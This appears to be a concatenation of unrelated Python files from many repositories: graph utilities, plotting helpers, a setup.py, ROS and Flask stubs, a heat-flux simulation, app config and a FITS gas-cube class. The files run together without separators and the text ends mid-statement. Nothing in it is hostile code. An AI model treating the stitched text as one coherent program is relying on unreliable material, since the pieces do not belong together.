vert_one, vert_two, weight=0): """ Adds an edge between two supplied vertices. """ if vert_one in self._table and vert_two in self._table: self._table[vert_one]['neighbors'][vert_two] = weight self._table[vert_two]['neighbors'][vert_one] = weight else: return None def get_vertices(self): """ Returns a list of vertices found in a graph. Returns None if graph is empty. """ output = [] for key in self._table: output.append(key) if output == []: return None return output def get_neighbors(self, vertex): """ Returns a dictionary of neighbors for the given vertex. Neighbors will be the keys and weights will be the values. """ if vertex in self._table: return self._table[vertex]['neighbors'] else: return None def size(self): """ Returns the number of vertices in the graph. """ return len(self._table) class Vertex: """ Class to create a new vertex for a graph. """ def __init__(self, data): """ Initializes an instance of a vertex with a *data* attribute value equal to the argument passed in. """ self.data = data items = ['first item', 'second item', 'third item', 'n item'] for i in items: print(i) # i matches the previous i # Same output, different names for item in items: print(item) # The name you use to iterate an object doesn't # matter for number in range(20): print(number+1) # Returns numbers from 1 to 20 objectc/CNN-with-TensorFlow2.0-and-Keras import matplotlib.pyplot as plt def plot_history(history): # Plot training & validation accuracy values plt.plot(history.history['sparse_categorical_accuracy']) plt.plot(history.history['val_sparse_categorical_accuracy']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Validate'], loc='upper left') plt.show() # Plot training & validation loss values plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Validate'], loc='upper left') plt.show() setup.py import versioneer from setuptools import setup, find_packages setup( version=versioneer.get_version(), cmdclass=versioneer.get_cmdclass(), name='txpasslib', description='Twisted wrapper for passlib', license='Expat', url='https://github.com/mithrandi/txpasslib', author='', author_email='', maintainer='', maintainer_email='', packages=find_packages(where='src'), package_dir={'': 'src'}, zip_safe=True, classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Natural Language :: English', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Topic :: Software Development :: Libraries :: Python Modules', ], install_requires=[ 'attrs>=16.0.0', 'passlib>=1.7.0', 'Twisted>=15.5.0', ], extras_require={ 'test': [ 'testtools>=2.2.0', 'hypothesis>=3.6.0,<6', ], }, ) #!/usr/bin/env python3 import rospy from std_msgs.msg import Float32 import RPi.GPIO as GPIO import time def cb(message): rospy.loginfo(message.data) rospy.init_node('answer_dis') sub = rospy.Subscriber('answer_up', Float32, cb) rospy.spin() sbisdog/multi_taskpublic/imagenet/utils.py import os import torch import logging from logging.handlers import TimedRotatingFileHandler def get_logger(name, log_dir='log'): """ Args: name(str): name of logger log_dir(str): path of log """ if not os.path.exists(log_dir): os.makedirs(log_dir) logger = logging.getLogger(name) logger.setLevel(logging.INFO) info_name = os.path.join(log_dir, '{}.info.log'.format(name)) info_handler = TimedRotatingFileHandler(info_name, when='D', encoding='utf-8') info_handler.setLevel(logging.INFO) error_name = os.path.join(log_dir, '{}.error.log'.format(name)) error_handler = TimedRotatingFileHandler(error_name, when='D', encoding='utf-8') error_handler.setLevel(logging.ERROR) formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') info_handler.setFormatter(formatter) error_handler.setFormatter(formatter) logger.addHandler(info_handler) logger.addHandler(error_handler) return logger class DataPrefetcher(): def __init__(self, loader): self.loader = iter(loader) self.stream = torch.cuda.Stream() self.preload() def preload(self): try: sample = next(self.loader) self.next_input, self.next_target = sample except StopIteration: self.next_input = None self.next_target = None return with torch.cuda.stream(self.stream): self.next_input = self.next_input.cuda(non_blocking=True) self.next_target = self.next_target.cuda(non_blocking=True) self.next_input = self.next_input.float() def next(self): torch.cuda.current_stream().wait_stream(self.stream) input = self.next_input target = self.next_target self.preload() return input, target class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count def accuracy(output, target, topk=(1, )): """Computes the accuracy over the k top predictions for the specified values of k""" with torch.no_grad(): maxk = max(topk) batch_size = target.size(0) _, pred = output.topk(maxk, 1, True, True) pred = pred.t() correct = pred.eq(target.view(1, -1).expand_as(pred)) res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0, keepdim=True) res.append(correct_k.mul_(100.0 / batch_size)) return resabdullahturkak/Django-pc-login-and-show from django.apps import AppConfig class GirisConfig(AppConfig): name = 'giris' flask_online_store/views/api/product.py from flask import Blueprint, render_template, session, redirect, url_for, request, flash, g, jsonify, abort from flask_restful import Resource class ProductView(Resource): def get(self, id=None): return {'test': 'hello, word from product'} def post(self, id=None): return {'test': 'hello, word from product'} def put(self, id=None): return {'test': 'hello, word'} def delete(self, id=None): return {'test': 'hello, word'} layerserver/migrations/0025_auto_20190326_1352.py1-10 # Generated by Django 2.1.7 on 2019-03-26 13:52 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('layerserver', '0024_auto_20190326_1337'), ] operations = [ migrations.AddField( model_name='databaselayer', name='form_fields', field=models.TextField(blank=True, null=True), ), migrations.AddField( model_name='databaselayer', name='list_fields', field=models.TextField(blank=True, null=True), ), ] import h5py import numpy as np import matplotlib.pylab as plt import pandas as pd import os from matplotlib import ticker from heat_flux_adi import simulate_adi_temp from scipy.signal import savgol_filter import matplotlib as mpl import json import ir_thermography.thermometry as irt import re import shutil import platform from scipy.optimize import OptimizeResult from scipy.optimize import least_squares from scipy.linalg import svd from scipy import interpolate base_path = r'C:\Users\erick\OneDrive\Documents\ucsd\Postdoc\research\data\firing_tests\IR_VS_POWER\graphite' filetag = 'graphite_simulated_surface_temperature' load_model = True saved_h5 = 'ADI_k1_7.41E-01_chi_0.60_P4.80E+03' time_constant = 1.5#2.1148 # time_constant = 0.5 # qmax = 5.55E3 * 0.65 qmax = 4.80E3 * 1.0 emissivity = 1.0 - (36.9 / 100) reflectance = 40.4 M = 200 # number of intervals in r N = 400 # the number of intervals in x R = 1.27*0.75 # The radius of the cylinder in cm R_sample = 0.5 * (3.0/8.0) * 2.54 #1.288 # L = 2.5 # the length of the cylinder holder_thickness = 1.27 dt = 1.0E-3 beam_diameter = 1.5 * 0.8165 # cm probe_size = 2.0 # mm thermography_spot_diameter = 0.8 # cm # thermography_spot_diameter = R_sample # density_g = 1.76 # g / cm^3 # GR008G # density_g = 1.81 # g / cm^3 # GR001CC density_g = 1.698 """ It has been found that the values of heat capacity for all types of natural and manufactured graphites are basically the same, except near absolute-zero temperatures. https://www.goodfellow.com/us/en-us/displayitemdetails/p/c-00-rd-000130/carbon-rod and https://poco.entegris.com/content/dam/poco/resources/reference-materials/brochures/brochure-graphite-properties-and-characteristics-11043.pdf """ # specific_heat_g = 0.712 # J / g / K specific_heat_g = 0.6752 # , et al., 1973 k0_1 = 85E-2 # W / (cm K) https://www.graphitestore.com/core/media/media.nl?id=6310&c=4343521&h=Tz5uoWvr-nhJ13GL1b1lG8HrmYUqV1M_1bOTFQ2MMuiQapxt # GR001C # k0_1 = 130E-2 # W / (cm K) https://www.graphitestore.com/core/media/media.nl?id=7164&c=4343521&h=8qpl24Kn0sh2rXtzPvd5WxQIPQumdO8SE5m3VRfVBFvLJZtj # GR008G # k0_1 = 200E-2 k0_2 = 16.2E-2 # W / (cm K) # kappa_1 = 1.11 # Thermal diffusivity of copper in cm^2/s # kappa_1 = 25E-2 # Thermal diffusivity of polycrystalline graphite in cm^2/s kappa_1 = k0_1 / (density_g * specific_heat_g) kappa_2 = 4.5E-2 # Thermal diffusivity of steel in cm^2/s chi = 1.0 - (reflectance / 100.0) T_a = 20.0 pulse_length = 2.0 t_max = 4.01 x_tc_1 = 1.0 x_tc_2 = 2.0 # Kim Argonne National Lab 1965 def cp_ss304l(temperature): return 4.184 * (0.1122 + 3.222E-5 * temperature) def rho_ss304l(temperature): return 7.9841 - 2.6506E-4 * temperature - 1.1580E-7 * temperature ** 2.0 def thermal_conductivity_ss304l(temperature): return 8.11E-2 + 1.618E-4 * temperature k0_2 = thermal_conductivity_ss304l(T_a + 273.15) cp_2 = cp_ss304l(T_a + 273.15) rho_2 = rho_ss304l(T_a + 273.15) kappa_2 = k0_2 / (cp_2 * rho_2) def get_experiment_params(relative_path: str, filename: str): # Read the experiment parameters results_csv = os.path.join(relative_path, f'{filename}.csv') count = 0 params = {} with open(results_csv) as f: for line in f: if line.startswith('#'): if count > 1: l = line.strip() print(l) if l == '#Data:': break pattern1 = re.compile("\s+(.*?):\s(.*?)\s(.*?)$") pattern2 = re.compile("\s+(.*?):\s(.*?)$") matches1 = pattern1.findall(l) matches2 = pattern2.findall(l) if len(matches1) > 0: params[matches1[0][0]] = { 'value': matches1[0][1], 'units': matches1[0][2] } elif len(matches2) > 0: params[matches2[0][0]] = { 'value': matches2[0][1], 'units': '' } count += 1 return params def correct_thermocouple_response(measured_temperature, measured_time, tau): n = len(measured_time) k = int(n / 15) k = k + 1 if k % 2 == 0 else k k = max(k, 5) # T = savgol_filter(measured_temperature, k, 3) # dTdt = np.gradient(T, measured_time, edge_order=2) delta = measured_time[1] - measured_time[0] dTdt = savgol_filter(x=measured_temperature, window_length=k, polyorder=4, deriv=1, delta=delta) # dTdt = savgol_filter(dTdt, k - 2, 3) r = measured_temperature + tau * dTdt return savgol_filter(r, k - 4, 3) def fobj(beta: np.ndarray, tc: np.ndarray, tc_time: np.ndarray, y: np.ndarray) -> np.ndarray: return correct_thermocouple_response(tc, tc_time, beta[0]) - y def get_pcov(res: OptimizeResult) -> np.ndarray: popt = res.x ysize = len(res.fun) cost = 2 * res.cost # res.cost is half sum of squares! s_sq = cost / (ysize - popt.size) # Do Moore-Penrose inverse discarding zero singular values. _, s, VT = svd(res.jac, full_matrices=False) threshold = np.finfo(float).eps * max(res.jac.shape) * s[0] s = s[s > threshold] VT = VT[:s.size] pcov = np.dot(VT.T / s ** 2, VT) pcov = pcov * s_sq if pcov is None: # indeterminate covariance print('Failed estimating pcov') pcov = np.zeros((len(popt), len(popt)), dtype=float) pcov.fill(np.inf) return pcov if __name__ == "__main__": adi_data_dir = os.path.join(os.path.join(base_path, 'adi_data')) with open('plot_style.json', 'r') as file: json_file = json.load(file) plot_style = json_file['defaultPlotStyle'] mpl.rcParams.update(plot_style) if not load_model: hf_file = simulate_adi_temp( laser_power=qmax, r_holder=R, r_sample=R_sample, length=L, kappa_1=kappa_1, kappa_2=kappa_2, k0_1=k0_1, k0_2=k0_2, r_points=M, x_points=N, pulse_length=pulse_length, dt=dt, chi=chi, T_a=T_a, t_max=t_max, report_every=20, debug=True, holder_thickness_cm=holder_thickness, save_h5=True, beam_diameter=beam_diameter, x_tc_1=x_tc_1, x_tc_2=x_tc_2, emissivity=1.0 ) if not os.path.exists(adi_data_dir): os.makedirs(adi_data_dir) shutil.move(hf_file + '.h5', os.path.join(adi_data_dir, hf_file + '.h5')) else: hf_file = saved_h5 dr = R / M dx = L / N probe_size_idx = int(probe_size * 0.1 / dx) probe_idx_delta = int(0.5 * probe_size_idx) x = dx * np.arange(0, N + 1) r = dr * np.arange(0, M + 1) msk_holder = r > R_sample idx_r = (np.abs(r - R_sample)).argmin() idx_pd_spot = (np.abs(r - thermography_spot_diameter * 0.5)).argmin() print(f'IR Thermography spot size: {thermography_spot_diameter * 10.0:.1f} mm') print(f'IDX of photodiode spot: {idx_pd_spot}, radius at index: {r[idx_pd_spot] * 10:.1f} mm') # Get the size of the time array elapsed_time = np.arange(0, t_max + dt, dt, dtype=np.float64) # The temperature at the surface of the rod closest to the light source tp1 = T_a * np.ones_like(elapsed_time) xp1 = x_tc_1 idx_p1 = int(xp1 / dx) # The temperature at the surface of the rod farther from the light source tp2 = T_a * np.ones_like(elapsed_time) xp2 = x_tc_2 idx_p2 = int(xp2 / dx) # Stefan-Boltzmann constant sb = 5.670374419E-12 # W cm^{-2} K^{-4} # The average temperature at the front surfacve t_front = T_a * np.ones_like(elapsed_time) # The temperature at the back surface t_back = T_a * np.ones_like(elapsed_time) # radiated power radiated_power = np.empty_like(t_back) hf_file_path = os.path.join(adi_data_dir, hf_file + '.h5') with h5py.File(hf_file_path, 'r') as hf: x = np.array(hf['data/x']) r = np.array(hf['data/r']) for i in range(len(tp1)): ds_name = f'data/T_{i:d}' with h5py.File(hf_file_path, 'r') as hf: u = np.array(hf.get(ds_name)) tp1[i] = u[idx_r, idx_p1 - probe_idx_delta:idx_p1 + probe_idx_delta].mean() tp2[i] = u[idx_r, idx_p2] t_front[i] = u[0:idx_pd_spot, 0:3].mean() radiated_power[i] = sb * emissivity * ((t_front[i] + 273.15) ** 4.0 - (T_a + 273.15) ** 4.0) t_back[i] = u[0, -1] fig, ax = plt.subplots(ncols=1) # , constrained_layout=True) fig.set_size_inches(5.0, 3.5) p0 = 0.5 * np.pi * qmax * (0.5 * beam_diameter) ** 2.0 estimated_power_density = p0 * (1.0 - np.exp(-2.0 * (2.0 * R_sample / beam_diameter) ** 2.0)) ax.plot(elapsed_time, t_front, label=f'Q={estimated_power_density * 0.01:.1f} MW/m$^{{\\mathregular{{2}}}}$, x=0.0 cm', c='tab:red', ls='-') leg = ax.legend( loc='best', ncol=1, frameon=False ) ax.tick_params(axis='y', right=True, zorder=10, which='both') ax.set_xlabel('Time (s)') ax.set_ylabel('Temperature (°C)') ax.set_xlim((0., 4.0)) ax.set_ylim(bottom=0.0) ax.xaxis.set_minor_locator(ticker.MultipleLocator(0.25)) ax.yaxis.set_major_locator(ticker.MultipleLocator(400)) ax.yaxis.set_minor_locator(ticker.MultipleLocator(100)) fig.tight_layout() fig.savefig(os.path.join(base_path, f'{filetag}_adi_raw_fit.png'), dpi=600) print(f"Filename: {hf_file}") plt.show() """Application configuration.""" import ast import os os_env = os.environ class Config(object): """Base configuration.""" SECRET_KEY = os.environ.get( 'WHATIFSTOCKS_SECRET', 'secret-key') APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory SQLALCHEMY_DATABASE_URI = os_env.get( 'WHATIFSTOCKS_DATABASE_URI', 'postgresql://localhost/example') ASSETS_DEBUG = False DEBUG_TB_ENABLED = False # Disable Debug toolbar DEBUG_TB_INTERCEPT_REDIRECTS = False SQLALCHEMY_TRACK_MODIFICATIONS = False SITE_NAME = 'What If Stocks' ADMINS = (os_env.get('WHATIFSTOCKS_ADMINS') and os_env.get('WHATIFSTOCKS_ADMINS').split(',') or []) MAIL_DEFAULT_SENDER = os_env.get( 'WHATIFSTOCKS_MAIL_DEFAULT_SENDER', '') MAIL_SERVER = os_env.get( 'WHATIFSTOCKS_MAIL_SERVER', 'localhost') MAIL_PORT = ( os_env.get('WHATIFSTOCKS_MAIL_PORT') and ast.literal_eval(os_env.get('WHATIFSTOCKS_MAIL_PORT')) or 25) MAIL_USE_TLS = ( os_env.get('WHATIFSTOCKS_MAIL_USE_TLS') and ast.literal_eval( os_env.get('WHATIFSTOCKS_MAIL_USE_TLS')) or False) MAIL_USE_SSL = ( os_env.get('WHATIFSTOCKS_MAIL_USE_SSL') and ast.literal_eval( os_env.get('WHATIFSTOCKS_MAIL_USE_SSL')) or False) MAIL_USERNAME = os_env.get('WHATIFSTOCKS_MAIL_USERNAME', None) MAIL_PASSWORD = os_env.get('WHATIFSTOCKS_MAIL_PASSWORD', None) MAILGUN_DOMAIN = os_env.get('WHATIFSTOCKS_MAILGUN_DOMAIN', None) MAILGUN_KEY = os_env.get('WHATIFSTOCKS_MAILGUN_KEY', None) MAILGUN_LOGGING_SENDER = MAIL_DEFAULT_SENDER MAILGUN_LOGGING_RECIPIENT = ADMINS MAIL_ERROR_SUBJECT_TEMPLATE = os_env.get( 'WHATIFSTOCKS_MAIL_ERROR_SUBJECT_TEMPLATE', '[{0}] Error report: {1}') SESSION_COOKIE_NAME = 'whatifstocks_session' REMEMBER_COOKIE_NAME = 'whatifstocks_remember_token' ERROR_MAIL_FORMAT = ( '\n' 'Message type: %(levelname)s\n' 'Location: %(pathname)s:%(lineno)d\n' 'Module: %(module)s\n' 'Function: %(funcName)s\n' 'Time: %(asctime)s\n' '\n' 'Message:\n' '\n' '%(message)s\n') STOCKANALYSIS_MONTHLY_PRICES_URL_PATTERN = os_env.get( 'WHATIFSTOCKS_STOCKANALYSIS_MONTHLY_PRICES_URL_PATTERN', ( 'https://www.alphavantage.co/query?' 'function=TIME_SERIES_MONTHLY_ADJUSTED&symbol={0}.{1}&' 'apikey={2}')) STOCKANALYSIS_ALPHAVANTAGE_APIKEY = os_env.get( 'WHATIFSTOCKS_STOCKANALYSIS_ALPHAVANTAGE_APIKEY', '') class ProdConfig(Config): """Production configuration.""" ENV = 'prod' DEBUG = False DEBUG_TB_ENABLED = False # Disable Debug toolbar class DevConfig(Config): """Development configuration.""" ENV = 'dev' DEBUG = True DEBUG_TB_ENABLED = True ASSETS_DEBUG = True # Don't bundle/minify static assets class TestConfig(Config): """Test configuration.""" TESTING = True DEBUG = True import matplotlib.pyplot as plt import numpy as np import time import gzip from astropy.io import fits from epsDetectS import epsDetect from matplotlib.colors import LogNorm from mpl_toolkits.axes_grid1 import AxesGrid from pseudoVoigt import pseudoVoigt # Quentin's version from reid19_rotation import rotcurve, R0, V0 from MW_utils import lbd2vlsr from scipy.io import loadmat import pdb def add_inner_title(ax, title, loc, size=None, **kwargs): from matplotlib.offsetbox import AnchoredText from matplotlib.patheffects import withStroke if size is None: size = dict(size=plt.rcParams['legend.fontsize']) at = AnchoredText(title, loc=loc, prop=size, pad=0., borderpad=0.5, frameon=False, **kwargs) ax.add_artist(at) at.txt._text.set_path_effects([withStroke(foreground="w", linewidth=3)]) return at class gascube: def __init__(self, filename, int2col=1., Ts=-10, fitres_files=None): hdus = fits.open(filename) # store header self.header = hdus[0].header # read the axis type and mapping values naxis = self.header.get('NAXIS') self.atlas = {} self.refpix = {} self.refval = {} self.delta = {} self.naxis = {} for i in range(naxis): if (self.header.get('CTYPE' + str(i + 1)) == 'GLON-CAR'): self.atlas['longitude'] = i + 1 self.refpix['longitude'] = self.header.get( 'CRPIX' + str(i + 1)) - 1 self.refval['longitude'] = self.header.get('CRVAL' + str(i + 1)) self.delta['longitude'] = self.header.get('CDELT' + str(i + 1)) self.naxis['longitude'] = self.header.get('NAXIS' + str(i + 1)) if (self.header.get('CTYPE' + str(i + 1)) == 'GLAT-CAR'): self.atlas['latitude'] = i + 1 self.refpix['latitude'] = self.header.get( 'CRPIX' + str(i + 1)) - 1 self.refval['latitude'] = self.header.get('CRVAL' + str(i + 1)) self.delta['latitude'] = self.header.get('CDELT' + str(i + 1)) self.naxis['latitude'] = self.header.get('NAXIS' + str(i + 1)) if (self.header.get( 'CTYPE' + str(i + 1)) == 'VELO-LSR' or self.header.get( 'CTYPE' + str(i + 1)) == 'VELO-LSRK' or self.header.get( 'CTYPE' + str(i + 1)) == 'VEL' or self.header.get( 'CTYPE' + str(i + 1)) == 'VRAD'): # initialise velocity unit self.vscale = 1. self.atlas['velocity'] = i + 1 self.refpix['velocity'] = self.header.get( 'CRPIX' + str(i + 1)) - 1 self.refval['velocity'] = self.header.get('CRVAL' + str(i + 1)) self.delta['velocity'] = self.header.get('CDELT' + str(i + 1)) self.naxis['velocity'] = self.header.get('NAXIS' + str(i + 1)) # check if velocity unit is stored in comment if 'M/S' in self.header.comments['CDELT' + str(i + 1)]: self.vscale = 1.e3 if 'KM/S' in self.header.comments['CDELT' + str(i + 1)]: self.vscale = 1. # check if velocity unit is defined by dedicated key # key takes precedence over comment try: u = self.header.get('CUNIT' + str(i + 1)) if u == 'M/S' or u == 'm/s' or u == 'm s-1': self.vscale = 1.e3 else: pass except: pass # find the value assigned to blank pixels try: bzero = self.header.get('BZERO') bscale = self.header.get('BSCALE') blank = self.header.get('BLANK') blankvalue = bzero + bscale * blank except: blankvalue = -10000 # open data and set to 0 blank pixels self.data = hdus[0].data if naxis == 3: self.data = hdus[0].data elif naxis == 4: self.data = hdus[0].data[0, :, :, :] else: print("ERROR, anomalous number of axes in FITS file", filename) self.data = np.nan_to_num(self.data) self.data[self.data <= (blankvalue + 0.1)] = 0. self.int2col = int2col self.Ts = Ts # default=-10 is optically thin approx # read fit results file if available, and set bool to True self.fitres = {} self.fitres['available'] = False if not fitres_files == None: try: fitres = np.load(fitres_files[0]) fitdiag = np.load(fitres_files[1]) self.fitres['available'] = True except: try: fitres = loadmat(fitres_files[0]) fitdiag = loadmat(fitres_files[1]) self.fitres['available'] = True except: pass if self.fitres['available']: self.fitres['vlin'] = fitres['vlin'] self.fitres['hfit'] = fitres['hfit'] self.fitres['vfit'] = fitres['vfit'] self.fitres['svfit'] = fitres['svfit'] self.fitres['etafit'] = fitres['etafit'] self.fitres['aic'] = fitdiag['aic'] if self.delta['longitude'] < 0.: # reverse axis self.fitres['vlin'] = self.fitres['vlin'][::-1, :, :] self.fitres['hfit'] = self.fitres['hfit'][::-1, :, :] self.fitres['vfit'] = self.fitres['vfit'][::-1, :, :] self.fitres['svfit'] = self.fitres['svfit'][::-1, :, :] self.fitres['etafit'] = self.fitres['etafit'][::-1, :, :] self.fitres['aic'] = self.fitres['aic'][::-1, :] def pix2coord(self, pixel, name): # transform pixel value into coordinate value for a given coordinate coordinate = self.refval[name] + self.delta[name] * ( pixel - self.refpix[name]) return coordinate def coord2pix(self, coordinate, name): # transform coordinate value into pixel value for a given coordinate pixel = int(round(self.refpix[name] + (1. / self.delta[name]) * ( coordinate - self.refval[name]))) return pixel def getValue(self, ll, bb, vv): # get the value in the cube corresponding to the pixels ll (longitude), # bb (latitude), vv (velocity ) vec = [0, 0, 0] vec[self.atlas['longitude'] - 1] = ll vec[self.atlas['latitude'] - 1] = bb vec[self.atlas['velocity'] - 1] = vv value = self.data[vec[2], vec[1], vec[0]] return value def getLineData(self, l, b, vmin, vmax): # extract the line data in agiven direction nbins = int( self.vscale * (vmax - vmin) / abs(self.delta['velocity'])) + 1 vdir = int(self.delta['velocity'] / abs(self.delta['velocity'])) vel = np.array([]) Tb = np.array([]) ll = self.coord2pix(l, 'longitude') bb = self.coord2pix(b, 'latitude') vvmin = self.coord2pix(self.vscale * vmin, 'velocity') for s in range(nbins): vv = int(vvmin + vdir * s) vel = np.append(vel, self.pix2coord(vv, 'velocity')) val = self.getValue(ll, bb, vv) Tb = np.append(Tb, val) vel /= self.vscale return vel, Tb def find_anomalies(self,T_thresh, outfilename): idx = np.where(self.data < T_thresh) f = open(outfilename,'w') N = np.shape(idx)[1] for s in range(N): lon = self.pix2coord(idx[3- self.atlas['longitude']][s],'longitude') lat = self.pix2coord(idx[3 - self.atlas['latitude']][s], 'latitude') vel = self.pix2coord(idx[3 - self.atlas['velocity']][s], 'velocity')/self.vscale f.write('{},{},{}\n'.format(lon,lat,vel)) f.close() def getFitResults(self, l, b, vmin, vmax): nbins = int( self.vscale * (vmax - vmin) / abs(self.delta['velocity'])) + 1 vdir = int(self.delta['velocity'] / abs(self.delta['velocity'])) il = self.coord2pix(l, 'longitude') ib = self.coord2pix(b, 'latitude') vvmin = self.coord2pix(self.vscale * vmin, 'velocity') vel = np.array([]) for s in range(nbins): vv = int(vvmin + vdir * s) vel = np.append(vel, self.pix2coord(vv, 'velocity')) vel /= self.vscale Tfit = np.zeros(nbins) nlin = np.sum(self.fitres['hfit'][il, ib, :] != 0.) PV = np.zeros((nbins, nlin)).astype('float32') if nlin != 0: for klin in range(nlin): PV[:, klin] = pseudoVoigt(self.fitres['hfit'][il, ib, klin], self.fitres['vfit'][il, ib, klin], self.fitres['svfit'][il, ib, klin], self.fitres['etafit'][il, ib, klin], vel) Tfit = np.sum(PV, axis=1).astype('float32') aic = self.fitres['aic'][il, ib] return vel, self.fitres['vfit'][il, ib, :], PV, Tfit, aic def line(self, l, b, vmin, vmax, vcuts=False, dcuts=False, cutfile = False, plotFit=False, lineDtc=False, lng=2, lis=1, sig=2.5, thresh=3., fitLine=False): vel, Tb = self.getLineData(l, b, vmin, vmax) self.ax = plt.subplot(111) self.ax.plot(vel, Tb, linewidth=0, color='k', marker='o', markersize=3) self.ax.set_xlabel('$V_\mathrm{LSR}$ (km s$^{-1}$)') self.ax.set_ylabel('$T_\mathrm{B}$ (K)') if vcuts: for s, vrange in enumerate(vcuts): lon = l lat = b vmin = eval(vrange[0]) vmax = eval(vrange[1]) plt.axvline(vmin, color='k') plt.axvline(vmax, color='k') elif dcuts: for bound in dcuts: lon = l lat = b vlsr = lbd2vlsr(lon, lat, bound,R0,V0,rotcurve) plt.axvline(vlsr, color='k') elif cutfile: cuts = np.load(cutfile) for cut in cuts: # make sure x-values are sorted idx = np.argsort(cut[0]) cut[1] = cut[1][idx] cut[0] = cut[0][idx] # plot at line position vlsr = np.interp(l, cut[0], cut[1],R0,V0,rotcurve) plt.axvline(vlsr, color='k') if plotFit: if self.fitres['available']: vel, vfit, PV, Tfit, aic = self.getFitResults(l, b, vmin, vmax) for klin in range(np.shape(PV)[1]): self.ax.plot(vel, PV[:, klin], color='g', linestyle='--') self.ax.plot(vel, Tfit, color='r') dev = np.sum(np.abs(Tb - Tfit)) / np.sum(Tb) print('AIC', aic) print('integrated fractional model deviation', dev) else: print("Fit results not available") if lineDtc: ilin, eps = epsDetect(Tb, lis=lis, lng=lng, sig=sig) ilin = np.array(ilin) eps = np.array(eps) ilin = ilin[eps > thresh] eps = eps[eps > thresh] for ii in range(len(ilin)): self.ax.plot(vel[ilin[ii]], eps[ii], marker='o', color='b', linewidth=0) if fitLine: fitres, model, ind_lines, vlin = self.mPSV_profile_fit(vel, Tb, lis=lis, lng=lng, thresh=thresh, sig=sig) self.ax.plot(vel, model, color='r', ) for n in range(len(ind_lines)): self.ax.plot(vel, ind_lines[n], color='g', linestyle='--') dev = np.sum(np.abs(Tb - model)) / np.sum(Tb) if (fitres['is_valid'] == True or \ (fitres['has_covariance'] == True and fitres[ 'has_valid_parameters'] == True and \ (fitres['has_reached_call_limit'] == False or fitres[ 'is_above_max_edm'] == False)) \ ) \ and dev < 1.: print('fit succeeded') else: print('fit failed') print(fitres) print('integrated fractional model deviation', dev) plt.show() def column(self, vel, Tb, Tbkg=2.66): # default Tbkg 2.66 K, CMB brightness temperature at 1.4GHz if self.Ts == -10.: intensity = self.int2col * np.sum(Tb) * np.abs( self.delta['velocity']) else: try: Tb[Tb > self.Ts - 5.] = self.Ts - 5. intensity = -self.int2col * np.abs( self.delta['velocity']) * self.Ts * np.sum( np.log(1 - Tb / (self.Ts - Tbkg))) except: intensity = -5000 intensity /= self.vscale return intensity def mapheader(self, hdu, lmax, bmin, bunit): # add the map keywords to the header hdu.header['CRPIX1'] = 1.0 hdu.header['CRVAL1'] = lmax hdu.header['CDELT1'] = -abs(self.delta['longitude']) hdu.header['CTYPE1'] = 'GLON-CAR' crpix_2 = self.coord2pix(0., 'latitude') - self.coord2pix(bmin, 'latitude') + 1 hdu.header['CRPIX2'] = crpix_2 hdu.header['CRVAL2'] = 0. hdu.header['CDELT2'] = abs(self.delta['latitude']) hdu.header['CTYPE2'] = 'GLAT-CAR' hdu.header['BUNIT'] = (bunit['unit'], bunit['quantity']) def commheader(self, hdu, comment): # add useful comments to the header hdu.header.add_comment(comment) def history(self, hdu, name, email): # add history cards hdu.header.add_history('map generated by {}, {}'.format(name, email)) hdu.header.add_history('on ' + time.ctime() + ' ' + time.tzname[1]) def lbmaps(self, lmin, lmax, bmin, bmax, vmin, vmax, names, vcuts=False, dcuts=False, cutfile = False, outdir='./', name_tag='', saveMaps=False, display=True, authname='', authemail='', useFit=False, dev_thresh=0.3): # check if required region is covered by input file, otherwise modify boundaries l1 = self.pix2coord(0, 'longitude') l2 = self.pix2coord(self.naxis['longitude'] - 1, 'longitude') ll = np.minimum(l1, l2) lu = np.maximum(l1, l2) lmin = np.maximum(lmin, ll) lmax = np.minimum(lmax, lu) b1 = self.pix2coord(0, 'latitude') b2 = self.pix2coord(self.naxis['latitude'] - 1, 'latitude') bl = np.minimum(b1, b2) bu = np.maximum(b1, b2) bmin = np.maximum(bmin, bl) bmax = np.minimum(bmax, bu) if vcuts == False and dcuts == False and cutfile == False: raise ValueError("Bounds for map generation not specified") else: lbins = int((lmax - lmin) / abs(self.delta['longitude'])) + 1 bbins = int((bmax - bmin) / abs(self.delta['latitude'])) + 1 ldir = self.delta['longitude'] / abs(self.delta['longitude']) bdir = self.delta['latitude'] / abs(self.delta['latitude']) F = plt.figure(1, (9, 8)) F.subplots_adjust(left=0.08, right=0.95, top=0.95, bottom=0.08) if vcuts: nn = len(vcuts) elif dcuts: nn = len(dcuts) + 1 elif cutfile: cuts = np.load(cutfile) nn = len(cuts) + 1 # make sure x-values are sorted for cut in cuts: idx = np.argsort(cut[0]) cut[1] = cut[1][idx] cut[0] = cut[0][idx] ngrid = int(np.ceil(np.sqrt(nn))) grid = AxesGrid(F, 111, nrows_ncols=(ngrid, ngrid), axes_pad=0.2, label_mode="L", share_all=True, cbar_location="top", cbar_mode="each", cbar_size="7%", cbar_pad="2%", ) extent = (lmax, lmin, bmin, bmax) vmaps = np.zeros([nn, bbins, lbins]) history = [] for ll in range(lbins): for bb in range(bbins): lpix = self.coord2pix(lmax, 'longitude') - ll * ldir bpix = self.coord2pix(bmin, 'latitude') + bb * bdir lon = self.pix2coord(lpix, 'longitude') lat = self.pix2coord(bpix, 'latitude') # if using distance cuts turn them in velocity if dcuts: vlsr = lbd2vlsr(lon, lat, np.array(dcuts),R0,V0,rotcurve) vlsr = np.append(vmin, vlsr) vlsr = np.append(vlsr, vmax) # if using a file build the velocity array for the l,b bin if cutfile: vlsr = np.array([]) vlsr = 